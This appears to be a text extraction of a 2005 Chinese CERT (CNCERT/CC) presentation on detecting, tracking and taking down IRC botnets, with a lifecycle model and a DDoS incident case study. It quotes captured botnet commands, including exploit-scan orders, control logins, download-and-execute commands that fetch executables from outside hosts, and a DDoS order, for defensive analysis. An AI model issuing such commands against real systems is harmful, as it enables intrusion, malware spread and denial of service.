互聯(lián)網(wǎng)網(wǎng)絡(luò)安全應(yīng)急工作回顧與展望

1、CNCERT/CC關(guān)于僵尸網(wǎng)絡(luò)的應(yīng)對措施國家計算機網(wǎng)絡(luò)應(yīng)急技術(shù)處理協(xié)調(diào)中心陳明奇 博士2005年11月17日 天津摘要第一部分 背景第二部分 發(fā)現(xiàn)和處置第三部分 CNCERT/CC的工作監(jiān)測情況和活動規(guī)律應(yīng)對措施第四部分 實際案例分析一 背景網(wǎng)絡(luò)安全的傳統(tǒng)三大威脅： 病毒/木馬/蠕蟲（Virus/Trojan/Worm）拒絕服務(wù)攻擊（DoS/DDoS）垃圾郵件 （Spam）黑客動機的改變：以經(jīng)濟利益為驅(qū)動，不再追求轟動性效果帶來的名聲和炫耀技巧 組織的改變：由單打獨斗轉(zhuǎn)向有組織的活動主要的新威脅：網(wǎng)絡(luò)仿冒釣魚陷井，防不勝防間諜軟件明修棧道，暗渡陳倉垃圾信息指哪發(fā)哪，帶寬垃圾僵尸網(wǎng)絡(luò)黑色軍團，一

2、呼百應(yīng)如何應(yīng)對這些新威脅？網(wǎng)絡(luò)仿冒APWG 間諜軟件VENDER(MS, AV company)垃圾信息尚未引起重視，將無所盾形僵尸網(wǎng)絡(luò)越來越嚴重，越來越多的人在談?wù)?004年，美國最大的家庭寬帶ISP Comcast被發(fā)現(xiàn)成為互聯(lián)網(wǎng)上最大的垃圾郵件來源，Comcast的用戶平均每天發(fā)送的8億封郵件中，有88是使用存在于Comcast內(nèi)的BotNet發(fā)送的垃圾郵件。，趨勢科技 TrendLabs在“2004年9月病毒感染分析報告”中指出，個人計算機成為任人擺布的僵尸計算機的機率，相較于去年9月成長23.5倍。2004年10月網(wǎng)絡(luò)安全機構(gòu) SANS表示，僵尸計算機已被黑客當(dāng)作用來勒索的工具，若要

3、避免服務(wù)器因 DoS 而癱瘓的代價是付給黑客4萬美金。2004年11月，根據(jù)反網(wǎng)釣工作小組（APWG）的安全專家觀察,網(wǎng)絡(luò)釣魚（Phishing）的技術(shù)愈來愈高明，現(xiàn)在騙徒可運用受控僵尸系統(tǒng)（BotNet）來擴大網(wǎng)釣范圍，坐等受害者上鉤。2004年出現(xiàn)的Korgo系列、GaoBot系列、SdBot系列蠕蟲組成的BotNet可接受控制者指令，實施許多網(wǎng)絡(luò)攻擊行動。3月爆發(fā)的Witty蠕蟲，Caida懷疑該蠕蟲利用BotNet散發(fā)，因為其初始感染計算機數(shù)目超過100臺。Botnet網(wǎng)絡(luò)安全界的新挑戰(zhàn)目前仍未得到有效遏制：2004年7月英國路透社的報導(dǎo)，有一個由青少年人組成的新興行業(yè)正盛行：出租可由

4、遠程惡意程序任意擺布的計算機，這些受控制的計算機稱之為”僵尸（Zombie）”計算機。數(shù)目小自10部大到3萬部，只要買主愿意付錢，它們可以利用這些僵尸網(wǎng)絡(luò)(BotNet)，進行垃圾郵件散播、網(wǎng)絡(luò)詐欺(phishing)、散播病毒甚至拒絕服務(wù)攻擊，代價僅需每小時100美元。問題：如何發(fā)現(xiàn)僵尸網(wǎng)絡(luò)？到底僵尸網(wǎng)絡(luò)在干什么？如何搗毀僵尸網(wǎng)絡(luò)？ 3.6 cents per bot week6 cents per bot weekSeptember 2004 postings to SpecialH, S20-30k always online SOCKs4, url is de-duped and up

5、dated every 10 minutes. 900/weekly, Samples will be sent on request. Monthly payments arranged at discount prices.$350.00/weekly - $1,000/monthly (USD) Type of service: Exclusive (One slot only)Always Online: 5,000 - 6,000Updated every: 10 minutesIRC僵尸網(wǎng)絡(luò)的發(fā)現(xiàn)一、蜜罐（Honeypot)例子：“honeynet project”項目二、IDS+

6、IRC協(xié)議解析：例子：863917網(wǎng)絡(luò)安全監(jiān)測平臺 三、BOT行為特征：快速加入型bot 長期連接型 bot發(fā)呆型bot 例子：DdoSVax項目二、僵尸網(wǎng)絡(luò)的發(fā)現(xiàn)和處置 IRC僵尸網(wǎng)絡(luò)發(fā)現(xiàn)方法比較作用范圍及發(fā)現(xiàn)的bot類型收集信息的類型收集信息的粒度HoneyPot監(jiān)測點上 有感染傳播能力的botbot收到/發(fā)出的所有消息很細 ，但只限于bot收發(fā)的信息IRC協(xié)議特征監(jiān)測范圍內(nèi) 活動的bot符合已知的（IRC）協(xié)議監(jiān)測條件的網(wǎng)絡(luò)通信內(nèi)容掌握整體信息和一些特定命令信息；如：可以發(fā)現(xiàn)控制者和控制服務(wù)器之間的信息，但缺乏報文內(nèi)容信息Bot行為特征監(jiān)測范圍內(nèi) 發(fā)現(xiàn)較大規(guī)模的且嚴格使用IRC協(xié)議的bo

7、tnet不適合收集具體信息掌握整體信息；不適合收集具體信息知己知彼：控制服務(wù)器信息：域名或IP、端口（port）、連接密碼 (如果有)；頻道信息: 頻道名（channel）、頻道密碼(如有)；控制密碼、編碼規(guī)則和Host控制者發(fā)送密碼到頻道中，用于標識身份，常以.login pass的形式出現(xiàn)。編碼規(guī)則和是否啟用host認證是bot程序?qū)崿F(xiàn)的，不體現(xiàn)在網(wǎng)絡(luò)通信中。Bot支持的命令集主要功能，包括認證、升級和自刪除類的命令，比如！login、.update、.download、.uninstall等。 僵尸網(wǎng)絡(luò)的處置一、擒賊先擒王模擬控制者，對僵尸網(wǎng)絡(luò)進行完全控制 最終解決辦法：直接找到控制服務(wù)

8、器，需要授權(quán)或用戶配合：方法1：發(fā)送更新命令(吃毒丸) ；方法2：發(fā)送自刪除命令 (集體自殺)；條件： 掌握控制者身份認證信息二、釜底抽薪切斷用戶主機和控制服務(wù)器的聯(lián)系 ：方法1：網(wǎng)絡(luò)邊界上阻斷C&C通信 條件：掌握控制服務(wù)器的準確信息 方法2：取消域名，無法解析;條件：得到授權(quán) 三、攘外必先安內(nèi)清除用戶終端上的Bot程序，打補丁：手工查殺專殺工具或升級殺毒程序問題：如何發(fā)現(xiàn)BOT? 僵尸網(wǎng)絡(luò)的處置三、CNCERT/CC的工作我們發(fā)現(xiàn)了什么？每兩天一次報告Top 5，6月3日至9月19日，發(fā)現(xiàn)較大規(guī)模僵尸網(wǎng)絡(luò)59個，平均每天發(fā)現(xiàn)3萬個僵尸網(wǎng)絡(luò)客戶端這些僵尸網(wǎng)絡(luò)不斷掃描擴張、更新版本、下載間諜軟

9、件和木馬、發(fā)動各種形式的拒絕服務(wù)攻擊。例如：hotgirls網(wǎng)絡(luò)，客戶端數(shù)量最多時達到29624個。頻道主題都是：ipscan s.s.s.s dcom2 86400 256 8000 s（利用dcom漏洞傳播，客戶端bot保持沉默）* wormride -s -t * download /df.exe c:windowsdefrag32.exe -e s(下載df.exe保存為defrag32并悄悄執(zhí)行)僵尸網(wǎng)絡(luò)情況統(tǒng)計(2005年6月3日-6月 23日)IRC C&C Server 分布: 34個 美國:18; 韓國:5; 中國:4; 瑞典:2; 意大利:2; 日本：1;挪威: 1; 香港

10、 :1.發(fā)現(xiàn)一個客戶端規(guī)模超過15萬的僵尸網(wǎng)絡(luò)(2005年8月19日9月19日)發(fā)現(xiàn)一昵稱為gunit的用戶曾經(jīng)登陸該網(wǎng)絡(luò)并向多個頻道發(fā)送控制命令，命令為掃描某種漏洞。如下。紅色部分和樣本的活動吻合。8月29日 12點PRIVMSG #asnftp :.login booties -s;cmd=:gunit!DIEdark.acid.xPRIVMSG #nesebot :.login nesebot -s;cmd=:gunit!DIEnesePRIVMSG #urxbot :.login prx -s;cmd=:gunit!DIE;TOPIC #.ForBotX.# :.adv.start l

11、sass 120 5 9999 -b -r -s;cmd=:gunit;TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit;TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunitTOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit;TOPIC #phat# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=

12、:gunit;發(fā)現(xiàn)了控制黑客的線索(2005年8月29日)僵尸網(wǎng)絡(luò)的生命周期 (Life Cycle)一、僵尸網(wǎng)絡(luò)的產(chǎn)生（botnet creation)其他傳播手段：垃圾郵件、社會工程學(xué)蠕蟲創(chuàng)建僵尸網(wǎng)絡(luò)：Deloder/Mytob/Zotob僵尸網(wǎng)絡(luò)創(chuàng)建新的僵尸網(wǎng)絡(luò)：2005.9.18 9:00332 botz-96018 #ass :!upd4t3z http:/peckno.site.voila.fr/win2k.exe the botz-96018連接到 67.43.*.*:6667 并加入 JOIN #suce fuck.然后，接收新命令：: 332 Suce-548836 #suc

13、e :-ntscan 254 1000 -a b于是，一個新的僵尸網(wǎng)絡(luò)就在開始形成僵尸網(wǎng)絡(luò)的生命周期 (Life Cycle)二、僵尸網(wǎng)絡(luò)的擴散（botnet spread）TOPIC #asn-new# :.advscan asn1smb 400 3 0 -r -b sTOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r sTOPIC #xdcc4 :sadvscan asn1smb 150 5 0 201.5.x.xTOPIC #XOwneD :!ntscan 350 1000 -a -b;TOPIC #111 :.advscan ls

14、ass_445 100 5 120 -r332 nffe #fanta :.scan pnp 50 6000 221332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r;332 #tvr0 x :advscan dcom135 300 5 0 -r s332 #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h!332 .#r00 x %advscan dcom135 300 5 0 -r -b s332 .#asn :.scanall s332 .#

15、.wadside :adv.start lsass 150 6 9999 -b -r s332 .#.pwnt. :.xscan msass 300 5 0 -b -s;332 .#.#smash3r#.# :.root.start msass 200 0 5 -a -r s332 .#scarezsql# :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100僵尸網(wǎng)絡(luò)的生命周期 (Life Cycle)三、僵尸網(wǎng)絡(luò)的遷移（botnet transfer）1. IRC Server變換物理主機(待發(fā)現(xiàn)實例)2. IRC S

16、erver邏輯變換：動態(tài)域名，指向同一主機;克隆，創(chuàng)建一個新的線程連接到新的服務(wù)器和頻道3. IRC Server內(nèi)部遷移有的Bot會從一個頻道遷移到另一頻道。為達到這個目的，僅僅需要修改原始頻道的主題即可。2005年9月27日發(fā)現(xiàn)的實例如下。時間BotDirservermessage9.27 19202.100.*.*(CN)64.18.*.* (UA): 332 #FEnRRuff :$J01n #1,#29.27 19202.100.*.*564.18. *.*JOIN para=#1,#2 (null)9.27 20202.100. *.*64.18. *.*: TOPIC #1 :$

17、advscan Asn1smbnt 150 5 0 -b -r -s9.27 20202.100. *.*64.18. *.*: TOPIC #2 :$advscan Asn1smbnt 150 5 0 -b -r -s9.27 21202.103.*.* (CN)64.18. *.*(UA)JOIN #FEnRRuff bot加入 #FEnRRuff頻道后，被命令加入頻道 #1 and #2 , 就會接收到命令 $advscan9.27 20202.103. *.*64.18. *.*: 332 #1 :$advscan Asn1smbnt 150 5 0 82.x.x.x -a -r -s

18、僵尸網(wǎng)絡(luò)的生命周期 (Life Cycle)四、僵尸網(wǎng)絡(luò)的升級（botnet update）Bot文件升級：通過TOPIC或 PRIVMSG 2005.9.18 8.am:Nos!W0otTOPIC #hb3 :.hell.download /cannon/php1/images/duh.exe explore.exe -e;cmd=;TOPIC #rooted :sdownload http:/site.voila.fr/qhzteam/asn.exePRIVMSG #em :!upadfkadf /stolen2.exe stolenBot 模塊升級：增加或減少相應(yīng)模塊2005年09月19

19、日 02點NotaBot:PRIVMSG #NotaBot :.spread.remove.module mssqlrnPRIVMSG #NotaBot :.spread.remove.module dcom1rnPRIVMSG #NotaBot :.spread.add.module vnc_scanrnPRIVMSG #NotaBot :.spread.add.module radmin_emptyrn僵尸網(wǎng)絡(luò)的生命周期 (Life Cycle)五、僵尸網(wǎng)絡(luò)的活動（Botnet Activity） 發(fā)動拒絕服務(wù)攻擊、下載spyware、竊取信息、掃描擴散等等。22005年09月19日 12

20、點PRIVMSG #NotaBotslog : VNC Found :218.14. *.*:111111 /發(fā)現(xiàn)新的VNC簡單密碼PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty/所具備的掃描漏洞的模塊0927日 20 TOPIC #bla :.ddos.random 81.169. *.* 80 120/發(fā)動拒絕服務(wù)攻擊僵尸網(wǎng)絡(luò)的生命周期 (Life Cycle)六、僵尸網(wǎng)絡(luò)的消亡（Botnet decease）1、C&C servers不可連接人為因素或其他因素

21、(網(wǎng)絡(luò)配置)：DDNS /DNS無法解析2、C&C server配置錯誤，bot無法加入3、 用戶清除了bot4、升級防病毒產(chǎn)品5、控制者或安全專家發(fā)出刪除指令( .remove/.uninstall)6、bot間彼此爭奪客戶端控制權(quán)CNCERT/CC如何應(yīng)對？1 自2004年12月起，利用863-917網(wǎng)絡(luò)安全監(jiān)測平臺，監(jiān)測IRC BotNet。2 加強對IRC BotNet實際危害的監(jiān)測和發(fā)現(xiàn)：2005年7月份建設(shè)Honeypot。3 加強對涉及BotNet事件的處理力度，利用積累的數(shù)據(jù)研究其活動規(guī)律，如“僵尸網(wǎng)絡(luò)生命周期”4 在網(wǎng)站上加強對BotNet危害的宣傳力度,為公眾提供有關(guān)流行B

22、ot的信息和解決方案。5 搜集互聯(lián)網(wǎng)上流行的Bot類惡意代碼樣本,聯(lián)合其他應(yīng)急組織、安全廠商，加大研究分析力度，發(fā)布安全工具。6 積極配合有關(guān)部門,打擊制作傳播利用Bot的犯罪分子。四、案例介紹：DDOS僵尸網(wǎng)絡(luò)事件處理過程（一）：發(fā)現(xiàn)1）接到用戶報警：大量的持續(xù)的拒絕服務(wù)攻擊，帶寬被嚴重占用。網(wǎng)絡(luò)訛詐？2）按照DDOS的處理流程，找到一臺攻擊主機，發(fā)現(xiàn)木馬程序。BotNet？事件處理過程（二）(二) 代碼分析：BKDR_VB.CQ木馬掃描功能；上傳下載文件功能；服務(wù)端版本升級；獲得服務(wù)端操作系統(tǒng)版本及語言，處理器型號信息，url信息；HTTP；SMTP； 事件處理過程（二）(二) 代碼分析I

23、RC控制服務(wù)器使用動態(tài)域名 anthony.ipv6.usr. peter.freehost. carlyle.dns2go. khond.vip.vhost. lamen.vhost. massuse.ipv6.free. bruce.free. john.usr. 事件處理過程（二）動態(tài)域名解析后得到IP地址及相應(yīng)源端口 216.152.*.*6667 美國 212.204.*.* 6667 荷蘭 64.12.*.* 6667 美國 207.68.*.* 6667 美國 61.197.*. * 8000 日本 218.157. *. * 443 韓國 221.146. *. * 554 韓

24、國 219.153. *. * 8000 重慶市攻擊源（202.108.*.*）會接收來自這八個IP地址發(fā)出的攻擊指令進行攻擊。事件處理過程（三）(三)重慶控制節(jié)點采集數(shù)據(jù) 在主機所有者的配合下，對BotNet和黑客的動作進行跟蹤。截止到12曰10日受到該肇事者控制的攻擊機大約有60000多臺；受到重慶控制機控制的攻擊機有8000多臺，當(dāng)時處于活動狀態(tài)的有3712臺。定位黑客：IP地址為60.2.*.*，河北某ADSL用戶事件處理過程(四)(四) 網(wǎng)絡(luò)監(jiān)測抽樣監(jiān)測及監(jiān)測數(shù)據(jù)分析 1、共計發(fā)現(xiàn)171641個IP地址被植入BKDR_VB.CQ木馬，其中大陸境內(nèi)156120臺。事件處理過程(四)2、境外，共計15521臺(2004年12月13日至2005年1月10日)向政府部門報告信息產(chǎn)業(yè)部國家信息化工作小組辦公室安全組公安部CNCERT/CC配合公安機關(guān)迅速行動事件處理過程(